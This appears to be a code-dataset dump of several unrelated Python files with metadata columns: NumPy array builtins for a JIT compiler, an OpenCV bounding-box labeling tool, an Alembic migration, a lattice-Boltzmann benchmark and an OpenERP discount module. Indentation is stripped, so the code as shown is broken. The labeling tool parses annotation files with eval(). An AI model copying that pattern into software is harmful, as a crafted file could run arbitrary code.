arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer))
def numpy_identity(context, builder, sig, args):
def identity(n):
arr = numpy.zeros((n, n))
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_identity(context, builder, sig, args):
def identity(n, dtype):
arr = numpy.zeros((n, n), dtype)
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n):
return numpy.identity(n)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m):
return numpy.eye(n, m, 0, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k):
return numpy.eye(n, m, k, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k, dtype):
arr = numpy.zeros((n, m), dtype)
if k >= 0:
d = min(n, m - k)
for i in range(d):
arr[i, i + k] = 1
else:
d = min(n + k, m)
for i in range(d):
arr[i - k, i] = 1
return arr
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number))
def numpy_arange_1(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(stop):
return numpy.arange(0, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number))
def numpy_arange_2(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop):
return numpy.arange(start, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number))
def numpy_arange_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop, step):
return numpy.arange(start, stop, step, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number), types.Kind(types.DTypeSpec))
def numpy_arange_4(context, builder, sig, args):
if any(isinstance(a, types.Complex) for a in sig.args):
def arange(start, stop, step, dtype):
nitems_c = (stop - start) / step
nitems_r = math.ceil(nitems_c.real)
nitems_i = math.ceil(nitems_c.imag)
nitems = max(min(nitems_i, nitems_r), 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
else:
def arange(start, stop, step, dtype):
nitems_r = math.ceil((stop - start) / step)
nitems = max(nitems_r, 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
res = context.compile_internal(builder, arange, sig, args,
locals={'nitems': types.intp})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number))
def numpy_linspace_2(context, builder, sig, args):
def linspace(start, stop):
return numpy.linspace(start, stop, 50)
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Integer))
def numpy_linspace_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def linspace(start, stop, num):
arr = numpy.empty(num, dtype)
div = num - 1
delta = stop - start
arr[0] = start
for i in range(1, num):
arr[i] = start + delta * (i / div)
return arr
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement("array.copy", types.Kind(types.Array))
def array_copy(context, builder, sig, args):
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape)
rettype = sig.return_type
ret = _empty_nd_impl(context, builder, rettype, shapes)
src_data = ary.data
dest_data = ret.data
assert rettype.layout == "C"
if arytype.layout == "C":
# Fast path: memcpy
# Compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
arrlen = builder.mul(arrlen, ary.itemsize)
pchar = lc.Type.int(8).as_pointer()
memcpy = builder.module.declare_intrinsic(
'llvm.memcpy', [pchar, pchar, arrlen.type])
builder.call(memcpy,
(builder.bitcast(dest_data, pchar),
builder.bitcast(src_data, pchar),
arrlen,
lc.Constant.int(lc.Type.int(32), 0),
lc.Constant.int(lc.Type.int(1), 0),
))
else:
src_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_strides = cgutils.unpack_tuple(builder, ret.strides)
intp_t = context.get_value_type(types.intp)
with cgutils.loop_nest(builder, shapes, intp_t) as indices:
src_ptr = cgutils.get_item_pointer2(builder, src_data,
shapes, src_strides,
arytype.layout, indices)
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
shapes, dest_strides,
rettype.layout, indices)
builder.store(builder.load(src_ptr), dest_ptr)
return impl_ret_new_ref(context, builder, sig.return_type, ret._getvalue())
@builtin
@implement(numpy.frombuffer, types.Kind(types.Buffer))
@implement(numpy.frombuffer, types.Kind(types.Buffer), types.Kind(types.DTypeSpec))
def np_frombuffer(context, builder, sig, args):
bufty = sig.args[0]
aryty = sig.return_type
buf = make_array(bufty)(context, builder, value=args[0])
out_ary_ty = make_array(aryty)
out_ary = out_ary_ty(context, builder)
out_datamodel = out_ary._datamodel
itemsize = get_itemsize(context, aryty)
ll_itemsize = lc.Constant.int(buf.itemsize.type, itemsize)
nbytes = builder.mul(buf.nitems, buf.itemsize)
# Check that the buffer size is compatible
rem = builder.srem(nbytes, ll_itemsize)
is_incompatible = cgutils.is_not_null(builder, rem)
with builder.if_then(is_incompatible, likely=False):
msg = "buffer size must be a multiple of element size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
shape = cgutils.pack_array(builder, [builder.sdiv(nbytes, ll_itemsize)])
strides = cgutils.pack_array(builder, [ll_itemsize])
data = builder.bitcast(buf.data,
context.get_value_type(out_datamodel.get_type('data')))
populate_array(out_ary,
data=data,
shape=shape,
strides=strides,
itemsize=ll_itemsize,
meminfo=buf.meminfo,
parent=buf.parent,)
res = out_ary._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
# -----------------------------------------------------------------------------
# Sorting
_sorting_init = False
def lt_floats(a, b):
return math.isnan(b) or a < b
def load_sorts():
"""
Load quicksort lazily, to avoid circular imports accross the jit() global.
"""
g = globals()
if g['_sorting_init']:
return
default_quicksort = quicksort.make_jit_quicksort()
g['run_default_quicksort'] = default_quicksort.run_quicksort
float_quicksort = quicksort.make_jit_quicksort(lt=lt_floats)
g['run_float_quicksort'] = float_quicksort.run_quicksort
g['_sorting_init'] = True
@builtin
@implement("array.sort", types.Kind(types.Array))
def array_sort(context, builder, sig, args):
load_sorts()
arytype = sig.args[0]
dtype = arytype.dtype
if isinstance(dtype, types.Float):
def array_sort_impl(arr):
return run_float_quicksort(arr)
else:
def array_sort_impl(arr):
return run_default_quicksort(arr)
return context.compile_internal(builder, array_sort_impl, sig, args)
@builtin
@implement(numpy.sort, types.Kind(types.Array))
def np_sort(context, builder, sig, args):
def np_sort_impl(a):
res = a.copy()
res.sort()
return res
return context.compile_internal(builder, np_sort_impl, sig, args)
| bsd-2-clause | -1,622,536,346,280,335,400 | 34.741639 | 96 | 0.599943 | false | 3.689943 | false | false | false |
frombeijingwithlove/dlcv_for_beginners | chap6/bbox_labeling/bbox_labeling.py | 1 | 7575 | import os
import cv2
from tkFileDialog import askdirectory
from tkMessageBox import askyesno
WINDOW_NAME = 'Simple Bounding Box Labeling Tool'
FPS = 24
SUPPOTED_FORMATS = ['jpg', 'jpeg', 'png']
DEFAULT_COLOR = {'Object': (255, 0, 0)}
COLOR_GRAY = (192, 192, 192)
BAR_HEIGHT = 16
KEY_UP = 65362
KEY_DOWN = 65364
KEY_LEFT = 65361
KEY_RIGHT = 65363
KEY_ESC = 27
KEY_DELETE = 65535
KEY_EMPTY = 0
get_bbox_name = '{}.bbox'.format
class SimpleBBoxLabeling:
def __init__(self, data_dir, fps=FPS, window_name=None):
self._data_dir = data_dir
self.fps = fps
self.window_name = window_name if window_name else WINDOW_NAME
self._pt0 = None
self._pt1 = None
self._drawing = False
self._cur_label = None
self._bboxes = []
label_path = '{}.labels'.format(self._data_dir)
self.label_colors = DEFAULT_COLOR if not os.path.exists(label_path) else self.load_labels(label_path)
imagefiles = [x for x in os.listdir(self._data_dir) if x[x.rfind('.') + 1:].lower() in SUPPOTED_FORMATS]
labeled = [x for x in imagefiles if os.path.exists(get_bbox_name(x))]
to_be_labeled = [x for x in imagefiles if x not in labeled]
self._filelist = labeled + to_be_labeled
self._index = len(labeled)
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
def _mouse_ops(self, event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
self._drawing = True
self._pt0 = (x, y)
elif event == cv2.EVENT_LBUTTONUP:
self._drawing = False
self._pt1 = (x, y)
self._bboxes.append((self._cur_label, (self._pt0, self._pt1)))
elif event == cv2.EVENT_MOUSEMOVE:
self._pt1 = (x, y)
elif event == cv2.EVENT_RBUTTONUP:
if self._bboxes:
self._bboxes.pop()
def _clean_bbox(self):
self._pt0 = None
self._pt1 = None
self._drawing = False
self._bboxes = []
def _draw_bbox(self, img):
h, w = img.shape[:2]
canvas = cv2.copyMakeBorder(img, 0, BAR_HEIGHT, 0, 0, cv2.BORDER_CONSTANT, value=COLOR_GRAY)
label_msg = '{}: {}, {}'.format(self._cur_label, self._pt0, self._pt1) \
if self._drawing \
else 'Current label: {}'.format(self._cur_label)
msg = '{}/{}: {} | {}'.format(self._index + 1, len(self._filelist), self._filelist[self._index], label_msg)
cv2.putText(canvas, msg, (1, h+12),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 0), 1)
for label, (bpt0, bpt1) in self._bboxes:
label_color = self.label_colors[label] if label in self.label_colors else COLOR_GRAY
cv2.rectangle(canvas, bpt0, bpt1, label_color, thickness=2)
cv2.putText(canvas, label, (bpt0[0]+3, bpt0[1]+15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
if self._drawing:
label_color = self.label_colors[self._cur_label] if self._cur_label in self.label_colors else COLOR_GRAY
if self._pt1[0] >= self._pt0[0] and self._pt1[1] >= self._pt0[1]:
cv2.rectangle(canvas, self._pt0, self._pt1, label_color, thickness=2)
cv2.putText(canvas, self._cur_label, (self._pt0[0] + 3, self._pt0[1] + 15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
return canvas
@staticmethod
def export_bbox(filepath, bboxes):
if bboxes:
with open(filepath, 'w') as f:
for bbox in bboxes:
line = repr(bbox) + '\n'
f.write(line)
elif os.path.exists(filepath):
os.remove(filepath)
@staticmethod
def load_bbox(filepath):
bboxes = []
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
bboxes.append(eval(line))
line = f.readline().rstrip()
return bboxes
@staticmethod
def load_labels(filepath):
label_colors = {}
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
label, color = eval(line)
label_colors[label] = color
line = f.readline().rstrip()
return label_colors
@staticmethod
def load_sample(filepath):
img = cv2.imread(filepath)
bbox_filepath = get_bbox_name(filepath)
bboxes = []
if os.path.exists(bbox_filepath):
bboxes = SimpleBBoxLabeling.load_bbox(bbox_filepath)
return img, bboxes
def _export_n_clean_bbox(self):
bbox_filepath = os.sep.join([self._data_dir, get_bbox_name(self._filelist[self._index])])
self.export_bbox(bbox_filepath, self._bboxes)
self._clean_bbox()
def _delete_current_sample(self):
filename = self._filelist[self._index]
filepath = os.sep.join([self._data_dir, filename])
if os.path.exists(filepath):
os.remove(filepath)
filepath = get_bbox_name(filepath)
if os.path.exists(filepath):
os.remove(filepath)
self._filelist.pop(self._index)
print('{} is deleted!'.format(filename))
def start(self):
last_filename = ''
label_index = 0
labels = self.label_colors.keys()
n_labels = len(labels)
cv2.namedWindow(self.window_name)
cv2.setMouseCallback(self.window_name, self._mouse_ops)
key = KEY_EMPTY
delay = int(1000 / FPS)
while key != KEY_ESC:
if key == KEY_UP:
if label_index == 0:
pass
else:
label_index -= 1
elif key == KEY_DOWN:
if label_index == n_labels - 1:
pass
else:
label_index += 1
elif key == KEY_LEFT:
if self._index > 0:
self._export_n_clean_bbox()
self._index -= 1
if self._index < 0:
self._index = 0
elif key == KEY_RIGHT:
if self._index < len(self._filelist) - 1:
self._export_n_clean_bbox()
self._index += 1
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
elif key == KEY_DELETE:
if askyesno('Delete Sample', 'Are you sure?'):
self._delete_current_sample()
key = KEY_EMPTY
continue
filename = self._filelist[self._index]
if filename != last_filename:
filepath = os.sep.join([self._data_dir, filename])
img, self._bboxes = self.load_sample(filepath)
self._cur_label = labels[label_index]
canvas = self._draw_bbox(img)
cv2.imshow(self.window_name, canvas)
key = cv2.waitKey(delay)
last_filename = filename
print('Finished!')
cv2.destroyAllWindows()
self.export_bbox(os.sep.join([self._data_dir, get_bbox_name(filename)]), self._bboxes)
print('Labels updated!')
if __name__ == '__main__':
dir_with_images = askdirectory(title='Where are the images?')
labeling_task = SimpleBBoxLabeling(dir_with_images)
labeling_task.start()
| bsd-3-clause | 2,674,751,870,218,334,700 | 32.223684 | 116 | 0.532937 | false | 3.620937 | false | false | false |
teampopong/pokr.kr | alembic/versions/3e683fc1af11_region_id_field_of_meetings_table.py | 1 | 1559 | # -*- coding: utf-8 -*-
"""region_id field of 'meetings' table
Revision ID: 3e683fc1af11
Revises: 2f08fb65fe0b
Create Date: 2014-05-24 21:31:25.378918
"""
from __future__ import unicode_literals
# revision identifiers, used by Alembic.
revision = '3e683fc1af11'
down_revision = '2f08fb65fe0b'
from alembic import op
from sqlalchemy.sql import table, column
import sqlalchemy as sa
region = table('region',
column('id', sa.String(16)),
column('name', sa.Unicode(20)),
column('name_en', sa.String(80)),
)
def upgrade():
op.alter_column('meeting', 'id', type_=sa.BigInteger, autoincrement=False)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.BigInteger)
op.alter_column('statement', 'meeting_id', type_=sa.BigInteger)
op.add_column('meeting', sa.Column('region_id', sa.String(length=16)))
op.create_index(op.f('ix_meeting_region_id'), 'meeting', ['region_id'], unique=False)
op.execute(
region.insert()\
.values({
'id': '0',
'name': '대한민국',
'name_en': 'national',
})
)
def downgrade():
op.alter_column('meeting', 'id', type_=sa.Integer, autoincrement=True)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.Integer)
op.alter_column('statement', 'meeting_id', type_=sa.Integer)
op.drop_index(op.f('ix_meeting_region_id'), table_name='meeting')
op.drop_column('meeting', 'region_id')
op.execute(
region.delete()\
.where(region.c.id == '0')
)
| apache-2.0 | -873,324,810,509,578,100 | 27.722222 | 89 | 0.620245 | false | 3.05315 | false | false | false |
Ektorus/bohrium | ve/cpu/tools/locate.py | 1 | 8762 | from __future__ import print_function
## 3D Lattice Boltzmann (BGK) model of a fluid.
## D3Q19 model. At each timestep, particle densities propagate
## outwards in the directions indicated in the figure. An
## equivalent 'equilibrium' density is found, and the densities
## relax towards that state, in a proportion governed by omega.
## Iain Haslam, March 2006.
import util
if util.Benchmark().bohrium:
import bohrium as np
else:
import numpy as np
def main():
B = util.Benchmark()
nx = B.size[0]
ny = B.size[1]
nz = B.size[2]
ITER = B.size[3]
NO_OBST = 1
omega = 1.0
density = 1.0
deltaU = 1e-7
t1 = 1/3.0
t2 = 1/18.0
t3 = 1/36.0
B.start()
F = np.ones((19, nx, ny, nz), dtype=np.float64)
F[:] = density/19.0
FEQ = np.ones((19, nx, ny, nz), dtype=np.float64)
FEQ[:] = density/19.0
T = np.zeros((19, nx, ny, nz), dtype=np.float64)
#Create the scenery.
BOUND = np.zeros((nx, ny, nz), dtype=np.float64)
BOUNDi = np.ones((nx, ny, nz), dtype=np.float64)
"""
if not NO_OBST:
for i in xrange(nx):
for j in xrange(ny):
for k in xrange(nz):
if ((i-4)**2+(j-5)**2+(k-6)**2) < 6:
BOUND[i,j,k] += 1.0
BOUNDi[i,j,k] += 0.0
BOUND[:,0,:] += 1.0
BOUNDi[:,0,:] *= 0.0
"""
if util.Benchmark().bohrium:
np.flush()
for ts in xrange(0, ITER):
##Propagate / Streaming step
T[:] = F
#nearest-neighbours
F[1,:,:,0] = T[1,:,:,-1]
F[1,:,:,1:] = T[1,:,:,:-1]
F[2,:,:,:-1] = T[2,:,:,1:]
F[2,:,:,-1] = T[2,:,:,0]
F[3,:,0,:] = T[3,:,-1,:]
F[3,:,1:,:] = T[3,:,:-1,:]
F[4,:,:-1,:] = T[4,:,1:,:]
F[4,:,-1,:] = T[4,:,0,:]
F[5,0,:,:] = T[5,-1,:,:]
F[5,1:,:,:] = T[5,:-1,:,:]
F[6,:-1,:,:] = T[6,1:,:,:]
F[6,-1,:,:] = T[6,0,:,:]
#next-nearest neighbours
F[7,0 ,0 ,:] = T[7,-1 , -1,:]
F[7,0 ,1:,:] = T[7,-1 ,:-1,:]
F[7,1:,0 ,:] = T[7,:-1, -1,:]
F[7,1:,1:,:] = T[7,:-1,:-1,:]
F[8,0 ,:-1,:] = T[8,-1 ,1:,:]
F[8,0 , -1,:] = T[8,-1 ,0 ,:]
F[8,1:,:-1,:] = T[8,:-1,1:,:]
F[8,1:, -1,:] = T[8,:-1,0 ,:]
F[9,:-1,0 ,:] = T[9,1:, -1,:]
F[9,:-1,1:,:] = T[9,1:,:-1,:]
F[9,-1 ,0 ,:] = T[9,0 , 0,:]
F[9,-1 ,1:,:] = T[9,0 ,:-1,:]
F[10,:-1,:-1,:] = T[10,1:,1:,:]
F[10,:-1, -1,:] = T[10,1:,0 ,:]
F[10,-1 ,:-1,:] = T[10,0 ,1:,:]
F[10,-1 , -1,:] = T[10,0 ,0 ,:]
F[11,0 ,:,0 ] = T[11,0 ,:, -1]
F[11,0 ,:,1:] = T[11,0 ,:,:-1]
F[11,1:,:,0 ] = T[11,:-1,:, -1]
F[11,1:,:,1:] = T[11,:-1,:,:-1]
F[12,0 ,:,:-1] = T[12, -1,:,1:]
F[12,0 ,:, -1] = T[12, -1,:,0 ]
F[12,1:,:,:-1] = T[12,:-1,:,1:]
F[12,1:,:, -1] = T[12,:-1,:,0 ]
F[13,:-1,:,0 ] = T[13,1:,:, -1]
F[13,:-1,:,1:] = T[13,1:,:,:-1]
F[13, -1,:,0 ] = T[13,0 ,:, -1]
F[13, -1,:,1:] = T[13,0 ,:,:-1]
F[14,:-1,:,:-1] = T[14,1:,:,1:]
F[14,:-1,:, -1] = T[14,1:,:,0 ]
F[14,-1 ,:,:-1] = T[14,0 ,:,1:]
F[14,-1 ,:, -1] = T[14,0 ,:,0 ]
F[15,:,0 ,0 ] = T[15,:, -1, -1]
F[15,:,0 ,1:] = T[15,:, -1,:-1]
F[15,:,1:,0 ] = T[15,:,:-1, -1]
F[15,:,1:,1:] = T[15,:,:-1,:-1]
F[16,:,0 ,:-1] = T[16,:, -1,1:]
F[16,:,0 , -1] = T[16,:, -1,0 ]
F[16,:,1:,:-1] = T[16,:,:-1,1:]
F[16,:,1:, -1] = T[16,:,:-1,0 ]
F[17,:,:-1,0 ] = T[17,:,1:, -1]
F[17,:,:-1,1:] = T[17,:,1:,:-1]
F[17,:, -1,0 ] = T[17,:,0 , -1]
F[17,:, -1,1:] = T[17,:,0 ,:-1]
F[18,:,:-1,:-1] = T[18,:,1:,1:]
F[18,:,:-1, -1] = T[18,:,1:,0 ]
F[18,:,-1 ,:-1] = T[18,:,0 ,1:]
F[18,:,-1 , -1] = T[18,:,0 ,0 ]
#Densities bouncing back at next timestep
BB = np.empty(F.shape)
T[:] = F
T[1:,:,:,:] *= BOUND[np.newaxis,:,:,:]
BB[2 ,:,:,:] += T[1 ,:,:,:]
BB[1 ,:,:,:] += T[2 ,:,:,:]
BB[4 ,:,:,:] += T[3 ,:,:,:]
BB[3 ,:,:,:] += T[4 ,:,:,:]
BB[6 ,:,:,:] += T[5 ,:,:,:]
BB[5 ,:,:,:] += T[6 ,:,:,:]
BB[10,:,:,:] += T[7 ,:,:,:]
BB[9 ,:,:,:] += T[8 ,:,:,:]
BB[8 ,:,:,:] += T[9 ,:,:,:]
BB[7 ,:,:,:] += T[10,:,:,:]
BB[14,:,:,:] += T[11,:,:,:]
BB[13,:,:,:] += T[12,:,:,:]
BB[12,:,:,:] += T[13,:,:,:]
BB[11,:,:,:] += T[14,:,:,:]
BB[18,:,:,:] += T[15,:,:,:]
BB[17,:,:,:] += T[16,:,:,:]
BB[16,:,:,:] += T[17,:,:,:]
BB[15,:,:,:] += T[18,:,:,:]
# Relax calculate equilibrium state (FEQ) with equivalent speed and density to F
DENSITY = np.add.reduce(F)
#UX = F[5,:,:,:].copy()
UX = np.ones(F[5,:,:,:].shape, dtype=np.float64)
UX[:,:,:] = F[5,:,:,:]
UX += F[7,:,:,:]
UX += F[8,:,:,:]
UX += F[11,:,:,:]
UX += F[12,:,:,:]
UX -= F[6,:,:,:]
UX -= F[9,:,:,:]
UX -= F[10,:,:,:]
UX -= F[13,:,:,:]
UX -= F[14,:,:,:]
UX /=DENSITY
#UY = F[3,:,:,:].copy()
UY = np.ones(F[3,:,:,:].shape, dtype=np.float64)
UY[:,:,:] = F[3,:,:,:]
UY += F[7,:,:,:]
UY += F[9,:,:,:]
UY += F[15,:,:,:]
UY += F[16,:,:,:]
UY -= F[4,:,:,:]
UY -= F[8,:,:,:]
UY -= F[10,:,:,:]
UY -= F[17,:,:,:]
UY -= F[18,:,:,:]
UY /=DENSITY
#UZ = F[1,:,:,:].copy()
UZ = np.ones(F[1,:,:,:].shape, dtype=np.float64)
UZ[:,:,:] = F[1,:,:,:]
UZ += F[11,:,:,:]
UZ += F[13,:,:,:]
UZ += F[15,:,:,:]
UZ += F[17,:,:,:]
UZ -= F[2,:,:,:]
UZ -= F[12,:,:,:]
UZ -= F[14,:,:,:]
UZ -= F[16,:,:,:]
UZ -= F[18,:,:,:]
UZ /=DENSITY
UX[0,:,:] += deltaU #Increase inlet pressure
#Set bourderies to zero.
UX[:,:,:] *= BOUNDi
UY[:,:,:] *= BOUNDi
UZ[:,:,:] *= BOUNDi
DENSITY[:,:,:] *= BOUNDi
U_SQU = UX**2 + UY**2 + UZ**2
# Calculate equilibrium distribution: stationary
FEQ[0,:,:,:] = (t1*DENSITY)*(1.0-3.0*U_SQU/2.0)
# nearest-neighbours
T1 = 3.0/2.0*U_SQU
tDENSITY = t2*DENSITY
FEQ[1,:,:,:]=tDENSITY*(1.0 + 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[2,:,:,:]=tDENSITY*(1.0 - 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[3,:,:,:]=tDENSITY*(1.0 + 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[4,:,:,:]=tDENSITY*(1.0 - 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[5,:,:,:]=tDENSITY*(1.0 + 3.0*UX + 9.0/2.0*UX**2 - T1)
FEQ[6,:,:,:]=tDENSITY*(1.0 - 3.0*UX + 9.0/2.0*UX**2 - T1)
# next-nearest neighbours
T1 = 3.0*U_SQU/2.0
tDENSITY = t3*DENSITY
U8 = UX+UY
FEQ[7,:,:,:] =tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U9 = UX-UY
FEQ[8,:,:,:] =tDENSITY*(1.0 + 3.0*U9 + 9.0/2.0*(U9)**2 - T1)
U10 = -UX+UY
FEQ[9,:,:,:] =tDENSITY*(1.0 + 3.0*U10 + 9.0/2.0*(U10)**2 - T1)
U8 *= -1.0
FEQ[10,:,:,:]=tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U12 = UX+UZ
FEQ[11,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U12 *= 1.0
FEQ[14,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U13 = UX-UZ
FEQ[12,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U13 *= -1.0
FEQ[13,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U16 = UY+UZ
FEQ[15,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
U17 = UY-UZ
FEQ[16,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U17 *= -1.0
FEQ[17,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U16 *= -1.0
FEQ[18,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
F *= (1.0-omega)
F += omega * FEQ
#Densities bouncing back at next timestep
F[1:,:,:,:] *= BOUNDi[np.newaxis,:,:,:]
F[1:,:,:,:] += BB[1:,:,:,:]
del BB
del T1
del UX, UY, UZ
del U_SQU
del DENSITY, tDENSITY
del U8, U9, U10, U12, U13, U16, U17
if util.Benchmark().bohrium:
np.flush()
B.stop()
B.pprint()
if B.outputfn:
B.tofile(B.outputfn, {'res': UX})
"""
import matplotlib.pyplot as plt
UX *= -1
plt.hold(True)
plt.quiver(UY[:,:,4],UX[:,:,4], pivot='middle')
plt.imshow(BOUND[:,:,4])
plt.show()
"""
if __name__ == "__main__":
main()
| lgpl-3.0 | -477,230,179,552,261,200 | 30.070922 | 88 | 0.351518 | false | 2.279396 | false | false | false |
Micronaet/micronaet-mx | sale_discount/model/discount.py | 1 | 4156 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# Original module for stock.move from:
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
discount_type = [
('integrated', 'Integrate'),
('inline', 'Inline'),
('row', 'Different row'),
]
class ResPartner(orm.Model):
''' Extra elemtent for manage discount
'''
_inherit = 'res.partner'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Update discount depend on scale (or reset scale)
'''
res = {'value': {}}
try:
if mode == 'scale':
scale = discount_scale.split('+')
discount_scale_cleaned = ''
rate = 100.0
for i in scale:
i = float(i.strip().replace('%', '').replace(',', '.'))
rate -= rate * i / 100.0
discount_scale_cleaned += "%s%5.2f%s " % (
'+' if discount_scale_cleaned else '', i, '%')
res['value']['discount'] = 100.0 - rate
res['value']['discount_scale'] = discount_scale_cleaned
else: # 'discount':
pass #res['value']['discount_scale'] = False
except:
res['warning'] = {
'title': _('Discount error'),
'message': _('Scale value not correct!'),
}
return res
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=35),
'discount': fields.float('Discount', digits=(
16, 2), help='Automated calculate if scale is indicated'),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
class SaleOrderLine(orm.Model):
''' Add agent commission
'''
_inherit = 'sale.order.line'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Call onchange in partner
'''
return self.pool.get('res.partner').onchange_discount(cr, uid, ids,
discount_scale=discount_scale, discount=discount, mode=mode,
context=context)
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=15),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
| agpl-3.0 | 6,720,405,219,061,504,000 | 34.220339 | 79 | 0.568816 | false | 4.311203 | false | false | false |
